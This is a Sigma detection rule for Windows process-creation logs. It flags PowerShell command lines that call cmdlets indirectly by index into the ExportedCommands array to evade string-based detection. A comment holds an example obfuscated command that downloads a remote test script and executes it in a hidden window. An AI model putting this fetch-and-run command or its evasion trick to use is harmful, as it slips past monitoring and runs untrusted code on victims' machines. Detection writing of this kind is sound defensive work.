title: PowerShell Dynamic Module Invocation Via ExportedCommands Array Index
id: 0c3ebe9f-df09-4e00-be0f-73d4ca8d62f6
related:
- id: 4ff4ad3e-9fb5-4a70-9962-d6ea58090318
type: similar
status: experimental
description: |
Detects PowerShell processes invoked with obfuscated command lines that enumerate Microsoft.PowerShell.Utility
exported commands and invoke cmdlets indirectly by array index. This technique is used to evade
detections that look for explicit strings such as Invoke-RestMethod or Invoke-Expression.
references:
- https://www.linkedin.com/posts/mark-o-halloran1_clickfix-defense-evasion-tactic-today-i-ugcPost-7453463467736408064-snrp/
author: Norbert Jaśniewicz (AlphaSOC), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-10-06
tags:
- attack.execution
- attack.stealth
- attack.t1027.010
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
# powershell.exe -NoP -W Hidden -C "$kp=12;$sEzg=32;$cSX=((Get-Module -ListAvailable 'Microsoft.PowerShell.Utility')).ExportedCommands.Values;$cSX=$cSX.Name;& $cSX[$kp] 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1' -OutFile C:\Temp\maldoc.ps1;$qJgm=$cSX[$sEzg];& $qJgm (Get-Content C:\Temp\maldoc.ps1 -Raw)"
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'powershell.exe'
- 'pwsh.dll'
selection_module_export_enum:
CommandLine|contains:
- 'Get-Module '
- 'gmo '
CommandLine|contains|all:
- 'ListAvailable'
- 'Microsoft.PowerShell.Utility'
- 'ExportedCommands'
- 'Values'
selection_index_used:
CommandLine|contains: '[*]'
condition: all of selection_*
falsepositives:
- Legitimate use of exported commands array indexing during PowerShell command execution (should be rare)
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_powershell_cmdlet_invocation_via_exported_commands_array_index/info.yml